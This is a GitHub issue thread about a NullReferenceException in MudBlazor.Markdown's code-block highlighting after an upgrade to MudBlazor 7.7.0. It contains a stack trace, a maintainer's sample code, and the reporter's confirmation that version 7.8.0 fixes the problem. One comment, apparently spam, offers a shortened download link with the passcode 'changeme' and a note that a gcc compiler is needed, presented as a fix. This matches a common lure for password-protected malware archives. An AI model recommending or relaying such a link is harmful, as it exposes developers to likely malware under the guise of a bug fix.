### ISSUE TITLE
Object reference when using MudBlazor 7.7.0 but not with 7.6.0

### ISSUE THREAD

**Issue by Mhaxym** [MyNihongo/MudBlazor.Markdown#273]
### Overview
I saw that you already have a PR to support MudBlazor 7.0 but I was already using 7.6.0 and it was working fine just with
```cs
<MudMarkdown Value="@Page.Content" CodeBlockTheme="CodeBlockTheme.StackoverflowLight" />
```

After updating to MudBlazor last version (from three days ago) to test everything it started throwing `Object reference` randomly.

```cs
System.NullReferenceException: Object reference not set to an instance of an object.
   at MudBlazor.Utilities.CssBuilder.AddValue(String value)
   at MudBlazor.Utilities.CssBuilder.AddClass(String value)
   at MudBlazor.MudCodeHighlight.get_CodeClasses()
   at MudBlazor.MudCodeHighlight.BuildRenderTree(RenderTreeBuilder builder)
   at Microsoft.AspNetCore.Components.Rendering.ComponentState.RenderIntoBatch(RenderBatchBuilder batchBuilder, RenderFragment renderFragment, Exception& renderFragmentException)
--- End of stack trace from previous location ---
   at Microsoft.AspNetCore.Components.RenderTree.Renderer.ProcessRenderQueue()
--- End of stack trace from previous location ---
   at Microsoft.AspNetCore.Components.RenderTree.Renderer.ProcessRenderQueue()
   at Microsoft.AspNetCore.Components.RenderTree.Renderer.AddToRenderQueue(Int32 componentId, RenderFragment renderFragment)
   at Microsoft.AspNetCore.Components.ComponentBase.StateHasChanged()
   at Microsoft.AspNetCore.Components.ComponentBase.CallOnParametersSetAsync()
   at Microsoft.AspNetCore.Components.ComponentBase.RunInitAndSetParametersAsync()
   at Microsoft.AspNetCore.Components.Rendering.ComponentState.SetDirectParameters(ParameterView parameters)
   at Microsoft.AspNetCore.Components.RenderTree.Renderer.RenderRootComponentAsync(Int32 componentId, ParameterView initialParameters)
   at Microsoft.AspNetCore.Components.HtmlRendering.Infrastructure.StaticHtmlRenderer.BeginRenderingComponent(IComponent component, ParameterView initialParameters)
   at Microsoft.AspNetCore.Components.Endpoints.EndpointHtmlRenderer.RenderEndpointComponent(HttpContext httpContext, Type rootComponentType, ParameterView parameters, Boolean waitForQuiescence)
   at Microsoft.AspNetCore.Components.Endpoints.RazorComponentEndpointInvoker.RenderComponentCore(HttpContext context)
   at Microsoft.AspNetCore.Components.Endpoints.RazorComponentEndpointInvoker.RenderComponentCore(HttpContext context)
   at Microsoft.AspNetCore.Components.Rendering.RendererSynchronizationContext.<>c.<<InvokeAsync>b__10_0>d.MoveNext()
--- End of stack trace from previous location ---
   at Microsoft.AspNetCore.Localization.RequestLocalizationMiddleware.Invoke(HttpContext context)
   at Microsoft.AspNetCore.Authorization.AuthorizationMiddleware.Invoke(HttpContext context)
   at Microsoft.AspNetCore.Authentication.AuthenticationMiddleware.Invoke(HttpContext context)
   at Microsoft.AspNetCore.Diagnostics.DeveloperExceptionPageMiddlewareImpl.Invoke(HttpContext context)

```

To reproduce it just create a project with MudBlazor 7.7.0 and try to use the component.

**Comment by tinsn** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by my-nihongo** [comment]
Thank you for your comment. We will make sure to update the NuGet version to the latest version and fix the bug (+ unit tests).

**Comment by MihailsKuzmins** [comment]
@Mhaxym could you please install [MudBlazor.Markdown v7.8.0](https://www.nuget.org/packages/MudBlazor.Markdown/) and verify that it is all right. I cannot reproduce the null ref exception in my sample and the codeblock is rendered successfully.

![image](https://github.com/user-attachments/assets/d347bbab-4da4-46a6-bdf3-02b33848f093)

```razor
@page "/"
@using System.Text

<PageTitle>Index</PageTitle>

<MudText Typo="Typo.h3">My markdown</MudText>
<MudMarkdown Value="@Value" CodeBlockTheme="CodeBlockTheme.StackoverflowLight"/>

@code
{
    private string Value { get; } = new StringBuilder("text *italics* and bold and this is a [link](https://www.mynihongo.org)")
        .AppendLine()
        .AppendLine()
        .AppendLine("cs")
        .AppendLine("var a = a;")
        .AppendLine("")
        .ToString();

    private void OnLinkClicked(string url)
    {
        Console.Write($"aaaa: {url}");
    }
}
```

**Comment by Mhaxym** [comment]
Hello! Thank you for your quick revision.

It's working fine with the latest version of `MudBlazor.Markdown`.

GJ :rocket:
